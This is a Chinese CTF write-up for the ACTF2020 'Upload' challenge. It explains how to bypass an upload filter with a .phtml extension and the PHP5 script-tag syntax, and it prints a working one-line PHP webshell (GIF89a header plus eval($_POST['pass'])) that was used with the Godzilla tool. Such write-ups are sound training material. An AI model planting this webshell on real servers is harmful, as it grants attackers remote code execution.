当前位置: 首页 > news >正文

[ACTF2020 新生赛]Upload

     先写一个万能的一句话木马

  • 使用一句话木马

  • 发现这个是有内容过滤的 过滤了 <?

  • 发现这个过滤的很死
  • 那就只能使用 不带 ? 的短标签了 使用script 标签 这个的使用只限于对方的php是5版本的

  • 正好是低版本的

  • 所以直接上传 改一下后缀为 phtml

  • 成功上传 但是我们没有找到具体的上传地址 :1、目录扫描 2、猜一下是不是 upload 目录
  • 发现猜对了

  • 哥斯拉链接

  • 找一下flag

  • flag{537f95ae-87a4-43f4-973a-1492ae8a92af}
  • 知识点 : 1、php 后缀的绕过 : phtml
  • 2、 php短标签的绕过(只有php版本为5开头的才行) :
  • GIF89a // 这个是万能标签 防止 MIME 检查文件头
  • <script language="php">
  • eval($_POST['pass']);
  • </script>

相关文章:

  • 大模型API密钥的环境变量配置(大模型API KEY管理)(将密钥存储在环境变量)(python-dotenv)(密钥管理)
  • 编译原理实验 之 Tiny C语言编译程序实验 语法分析
  • 李臻20242817_安全文件传输系统项目报告_第9周
  • w~嵌入式C语言~合集4
  • flask uri 怎么统一加前缀
  • 【Web API系列】深入解析 Web Service Worker 中的 WindowClient 接口:原理、实践与进阶应用
  • Spring框架的ObjectProvider用法
  • C#通过NTP服务器获取NTP时间
  • 鸿蒙版电影app设计开发
  • 鸿蒙NEXT开发正则工具类(ArkTs)
  • django admin 设置字段不可编辑
  • php安装swoole扩展
  • 【halcon】tuple_sort_index 和 select_obj 配合使用 详解
  • [特殊字符]实战:使用 Canal + MQ + ES + Redis + XXL-Job 打造高性能地理抢单系统
  • ASP.NET图片盗链防护指南
  • 总线位宽不变,有效数据位宽变化的缓存方案
  • 概率论与统计(不确定性分析)主要应用在什么方面?涉及到具体知识是什么?
  • 深入解析 npm 与 Yarn:Node.js 包管理工具对比与选型指南
  • 考研系列-计算机组成原理第五章、中央处理器
  • Spring Cloud Stream喂饭级教程【搜集全网资料整理】
  • 竞彩湃|拜仁冲冠战役或有冷门,大巴黎留力欧冠半决赛
  • 用小型核反应堆给数据中心供电,国内企业正在开展项目论证
  • 神舟十九号航天员乘组平安抵京
  • 滨江集团:一季度营收225.07亿元,净利润9.75亿元
  • 海口市政协党组成员、秘书长、机关党组书记汪娟被查
  • 当老年人加入“行为艺术基础班”